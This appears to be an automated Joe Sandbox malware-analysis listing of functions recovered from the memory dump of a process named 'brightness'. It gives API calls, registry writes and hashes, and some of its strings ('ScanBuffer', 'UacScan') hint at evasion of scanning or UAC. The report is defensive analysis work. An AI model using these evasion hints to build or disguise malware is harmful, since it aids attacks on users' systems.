CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02795D74,?,?,02793900,00000001), ref: 02795C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02795D74,?,?,02793900,00000001), ref: 02795CB6

Part of subcall function 02787D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02793900,02795CF6,00000000,02795D74,?,?,02793900), ref: 02787DAA

Part of subcall function 02787F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02793900,02795D11,00000000,02795D74,?,?,02793900,00000001), ref: 02787FB7

GetLastError.KERNEL32(00000000,02795D74,?,?,02793900,00000001), ref: 02795D1B

Part of subcall function 0278A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0278C3D9,00000000,0278C433), ref: 0278A797

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: e5a196575b5b5cd1778bab7e26b4c2226d986243c0d3cd15052689c25728857a
Instruction ID: 8d4cce6ae430ae78241ec964bef0f54c3f4aef90fa8ffb13c5e0b67dd9c7d175
Opcode Fuzzy Hash: e5a196575b5b5cd1778bab7e26b4c2226d986243c0d3cd15052689c25728857a
Instruction Fuzzy Hash: CD31C470A407159FDB02FFA9D88979EB7F6AB09700F908065D404EB390D7755E05CFA1

Function 0279F506 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,028CFA64), ref: 0279F54C
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,0279F5B7), ref: 0279F584
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,0279F5B7), ref: 0279F58F

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 1dc74601684a57e2825f7ae189a2f3e6a9072b7a9aca2a28115dc705706e8504
Instruction ID: 38036289c6cc613089342eb1b7ef30f41aad5b311cf174466c9437d13b5e764b
Opcode Fuzzy Hash: 1dc74601684a57e2825f7ae189a2f3e6a9072b7a9aca2a28115dc705706e8504
Instruction Fuzzy Hash: 0A110D75680205AFEB12FF68EC95E5DBBEDEB04700F504461F504D7A50EB70EA508F55

Function 0279F508 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,028CFA64), ref: 0279F54C
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,0279F5B7), ref: 0279F584
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,0279F5B7), ref: 0279F58F

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 36fa01a5b5d052b3e1b310e38445bd9c437f1854c69cfe8bdb9edb00ae68debd
Instruction ID: 48fdb66dde90852c0013fd4defe6f558c9c804270ffc1312a37984638c7366ff
Opcode Fuzzy Hash: 36fa01a5b5d052b3e1b310e38445bd9c437f1854c69cfe8bdb9edb00ae68debd
Instruction Fuzzy Hash: 08110D75680205AFEB12FF68EC95E5DBBEDEB04700F504461F504D7A50EB70EA508F55

Function 0278E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0278E373

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2f80faef7ad7e40ad8717c317f9f0a4d64a6fea706fab6129ebae4a68c112db5
Instruction ID: f3adab5f1c3ab23df4710d5d486125af1137f8cd7980a62dd9d54ac9e2660ac8
Opcode Fuzzy Hash: 2f80faef7ad7e40ad8717c317f9f0a4d64a6fea706fab6129ebae4a68c112db5
Instruction Fuzzy Hash: 73F090207C8210E7DB2A7B3A9DCC66E379A5F41350750583AF40AABA16DF74CC45CB72

Function 02784D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0279F798), ref: 02784C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02784D5B
SysFreeString.OLEAUT32(00000000), ref: 02784D6D

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5dddb5a7acdf1ffc264aed21d51a399118c55e024ce88522a09c9b5f103c8e92
Instruction ID: 2f2be7956bf0e1d38196d9aaa0ceba7a13f9ec8f8f97ba82389a08d2f2c0394c
Opcode Fuzzy Hash: 5dddb5a7acdf1ffc264aed21d51a399118c55e024ce88522a09c9b5f103c8e92
Instruction Fuzzy Hash: 3BE0C2B83822026EEF053F218C54B37332EAFC1750F548098A900CA010E778C401AE38

Function 027970DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 027973DA

Strings

H, xrefs: 02797191

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 8e732cbaab46a7dc71ea55dd94948580379719480298201fd6c93b79d3d33a4c
Instruction ID: 657066cb1ffbb9e14f38bfcd6668824ef67048b97244a7524693d0a9557bbf76
Opcode Fuzzy Hash: 8e732cbaab46a7dc71ea55dd94948580379719480298201fd6c93b79d3d33a4c
Instruction Fuzzy Hash: 9CB1C2B4A617089FDB19CF99E480A9DFBF2FF89314F258169E845AB360D730A845CF50

Function 0278E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0278E781

Part of subcall function 0278E364: VariantClear.OLEAUT32(?), ref: 0278E373

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: cdf0540fed75434f9a459a956e63fde0793aafebac4495064f3bc728bdadd611
Instruction ID: 31f609eb702a43c3fff6f9bcdbb301d8f16a44b4a41967a57401f907e7c1427f
Opcode Fuzzy Hash: cdf0540fed75434f9a459a956e63fde0793aafebac4495064f3bc728bdadd611
Instruction Fuzzy Hash: 5211A53079022197D736FF29C9C8A6B37DAAF857507119436F55A9B619EB30CC40CA62

Function 0278E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0278E43C

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 8cdc2402705897fd3ce5e83073e83bde4c05a7545f1296b2d60dec4d6f996859
Instruction ID: 8f1ade62bc114cfe8fc39342cc5475d2b9ad734cc2f96b6ef54be496240947c6
Opcode Fuzzy Hash: 8cdc2402705897fd3ce5e83073e83bde4c05a7545f1296b2d60dec4d6f996859
Instruction Fuzzy Hash: 3B313E72A80209AFDB11FFA8D888AAE77F9EB0D314F544565F90DD3250D734E990CBA1

Function 02796D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02796DB9,?,?,?,00000000), ref: 02796D99

Part of subcall function 02784C60: SysFreeString.OLEAUT32(0279F798), ref: 02784C6E

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 26b63da3a67169af299f0fce06c5294bd1ebdf8fc7b4a96dbed38a260e769a2f
Instruction ID: 2a7e89661ea220269022a748f974f1a60684628fa149406965f35520cd3c3bf6
Opcode Fuzzy Hash: 26b63da3a67169af299f0fce06c5294bd1ebdf8fc7b4a96dbed38a260e769a2f
Instruction Fuzzy Hash: 60E0E5752403087BEB13FB67EC51D5E77EDDB8A710B5144B5E50093600F9756D0088B0

Function 02785868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02780000,?,00000105), ref: 02785886

Part of subcall function 02785ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02780000,027AE790), ref: 02785AE8
Part of subcall function 02785ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02780000,027AE790), ref: 02785B06
Part of subcall function 02785ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02780000,027AE790), ref: 02785B24
Part of subcall function 02785ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02785B42
Part of subcall function 02785ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02785BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02785B8B
Part of subcall function 02785ACC: RegQueryValueExA.ADVAPI32(?,02785D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02785BD1,?,80000001), ref: 02785BA9
Part of subcall function 02785ACC: RegCloseKey.ADVAPI32(?,02785BD8,00000000,?,?,00000000,02785BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02785BCB

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: bc9dc5d3c5ee9866ffb0c11c5a605bd516e8665aaca7043c5fdc8765818d0bc2
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: F5E06D71A403148FCB11EE98C8C5B5637D8AB08750F450961EC58CF346D7B0D9108BD1

Function 02787DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02787DF4

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: 69ac56ed7311e7514e7715875e191570427dccd041b54c4e0248a0b9d56eacb6
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: 19D05BB63081507AE224A55A5D44FA75BDCDBC6771F10063DF558C7180D7208C01C6B1

Function 02787E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,027A0714,ScanString,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanString,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,UacInitialize), ref: 02787E67

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
Instruction ID: 51de6b7294a18f1a76446cdd0652f8d8f06207fa0742fe998e7bac1c649d3d52
Opcode Fuzzy Hash: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
Instruction Fuzzy Hash: F4C08CA63812001A5A68B5BC2CC8249538A09042783740A61A479CA2E2E32298A22810

Function 02787E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,027A3891,ScanString,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,Initialize), ref: 02787E8B

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
Instruction ID: b4634119900ac2de2229569610b322efb551f0bc32dc86161654034e959eb84b
Opcode Fuzzy Hash: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
Instruction Fuzzy Hash: C7C08CF73912010A1E64B5BC1CC8319438909841347701E61E4B9CA2C2E31698222820

Function 02784C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02784C8B

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
Instruction ID: 2dd76521f5e34d98e90261cb55e180683166a5dd52e3ef0d0efc898db79543d0
Opcode Fuzzy Hash: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
Instruction Fuzzy Hash: 2BC012A268123157EB216A99ACC475262CC9B052A4F1400A19504D7250F3A4980047A1

Function 02784C9C Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0279F798), ref: 02784C6E
SysReAllocStringLen.OLEAUT32(027AC858,0279F798,000000B4), ref: 02784CB6

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
Instruction ID: 69c4161571a72e76be47769fdf49bc0f3b5eac577a59184826d3bad76f371925
Opcode Fuzzy Hash: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
Instruction Fuzzy Hash: D9D01274281147699A2CBA279574937615E99D020678CC25D9A029A254F7A59400CA71

Function 027AC534 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,027AC528,00000000,00000001), ref: 027AC544

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 9de4aaaf0b872278caa34f7e5690fa927425d036c4ffc911639861ce1b9eaaec
Instruction ID: 9945f2a1060060c56fb6904270f415c16f67e9aef8742a27b15cb84cb6839ee1
Opcode Fuzzy Hash: 9de4aaaf0b872278caa34f7e5690fa927425d036c4ffc911639861ce1b9eaaec
Instruction Fuzzy Hash: 4DC048A17C53003AFA16A6A95C92F2315DED759B11F24052ABA00EE2D2E2A249104A20

Function 02784C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02784C3F

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 5a80bfbfefa19c8dbce1b77066bd185c3ca8ae6843a329b47926191b7a176b50
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: C6B012343C924355FA5832A30F20773048D0B40287FC400919F18D80D1FB80C0028836

Function 02784C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02784C57

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
Instruction ID: f8738080897c7891fb4e7bbacb8a2ced54dd514bc47fc1a8138fd0f1e7b12210
Opcode Fuzzy Hash: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
Instruction Fuzzy Hash: ADA022AC2803030ACF0B332C003003F223B3FC03003CAC0E803008A0008F3A8002AE30

Function 027815CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02781A03,?,02782000), ref: 027815E2

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
